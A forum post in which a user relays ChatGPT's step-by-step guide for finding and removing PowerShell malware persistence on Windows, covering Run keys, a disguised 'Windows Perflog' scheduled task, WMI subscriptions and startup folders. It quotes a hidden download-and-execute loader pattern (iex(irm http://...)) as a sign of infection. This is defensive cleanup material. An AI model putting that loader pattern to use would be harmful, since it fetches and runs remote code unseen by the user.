While searching for a solution, ChatGPT made me do something. It seems to work for me. I do not know much about computers, so I asked ChatGPT to summarize the steps that we have done, and below is its answer. (I AM NOT AWARE OF WHAT THE CODE BELOW DOES AND DO NOT CLEARLY SUGGEST FOLLOWING THESE STEPS WITHOUT CHECKING BY YOURSELF. However, it works for me.)
STEP 1 – Check the Registry Run key
Open PowerShell as Administrator and run:
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
If you see something similar to this:
Windows PowerShell v1.0 powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex(irm http://...)"
this is malicious.
Remove it with:
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows PowerShell v1.0" /f
However, removing the registry key alone usually does NOT fix the issue.
STEP 2 – Find what is launching PowerShell (important)
Run this command:
Get-CimInstance Win32_Process | Where-Object {$_.Name -like "powershell*"} | Select Name,ProcessId,ParentProcessId,CommandLine
If the parent process looks like:
svchost.exe -k netsvcs -s Schedule
then PowerShell is being started by the Windows Task Scheduler.
STEP 3 – Find the malicious scheduled task
Run:
Get-ScheduledTask | ForEach-Object { foreach ($a in $_.Actions) { "$($_.TaskPath)$($_.TaskName) | $($a.Execute) $($a.Arguments)" } }
Look for tasks that launch PowerShell with arguments like:
ExecutionPolicy Bypass WindowStyle Hidden iex(irm http://...)
In my case the malicious task was:
Windows Perflog
which executed:
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex(irm http://.../task)"
This task name tries to look like a Windows system task but it is not legitimate.
Delete it using:
Unregister-ScheduledTask -TaskName "Windows Perflog" -Confirm:$false
STEP 4 – Check WMI persistence
Some malware uses WMI event subscriptions.
Run:
Get-WmiObject -Namespace root\subscription -Class __EventFilter
Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer
Get-WmiObject -Namespace root\subscription -Class ActiveScriptEventConsumer
If any entry launches PowerShell or contains URLs, it is suspicious.
STEP 5 – Check Startup folders
Check these folders:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
Look for scripts such as:
.ps1, .vbs, .bat
STEP 6 – Final check
Verify running PowerShell processes:
Get-CimInstance Win32_Process | Where-Object {$_.Name -like "powershell*"} | Select Name,CommandLine
Only the PowerShell instance you opened manually should appear.